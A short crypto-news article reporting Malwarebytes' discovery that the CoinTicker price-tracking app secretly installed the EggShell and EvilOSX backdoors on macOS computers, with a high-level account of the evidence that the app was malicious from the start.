Malwarebytes, a platform that protects users against malware, malicious websites, and other advanced online threats reported that 1vladimir, a contributor to the Malwarebytes forum noticed that CoinTicker iOS app which was used to monitor cryptocurrency prices was privately installing two different backdoors onto the computers.
The report further stated that the app did not display any type of harmful activity, so a user will regularly use the app without realizing that they are vulnerable to being hacked. Post installation, the CoinTicker app will allow its users to select those cryptocurrencies whose prices are to be monitored. Some of the major cryptocurrencies include Bitcoin [BTC], Ethereum [ETH], and Monero [XMR].
Furthermore, a small widget will be added onto the macOS menu bar that updates the prices as they fluctuate. Once the application is installed on the computer, CoinTicker is used to download EvilOSX and EggShell which are open-source backdoors.
Post installation, a custom compiled version of the EggShell server is downloaded on the macOS with the help of shell commands. Although the goal of the hacker behind using this malware is still very unclear, both EggShell and EvilOSX are backdoors which can be used for gaining access to cryptocurrency wallets of users in order to steal cryptocurrency.
The report stated that this could have been a potential supply chain attack, in which the creator and the application itself is legitimate but the website is hacked by a third party to spread a malicious version of the app.
Further investigation revealed that the app was never legitimate in the first place. This is because the domain name of the application is “coin-sticker.com” which is not the same as the name of the application. According to the report, a wrong domain name was something which was “awfully sloppy” if it was a legitimate app.
In addition, the domain name was only registered a couple of months ago which has created further suspicion. The report further added that the malware did not require any root permissions whereas there is usually an inaccurate emphasis on the malware’s need for root privileges. On the contrary, this malware is an example that they do not need root privileges to have a high potential for danger.
The post Bitcoin [BTC], Ethereum [ETH] and Monero [XMR] could be at risk due to new malware on macOS appeared first on AMBCrypto.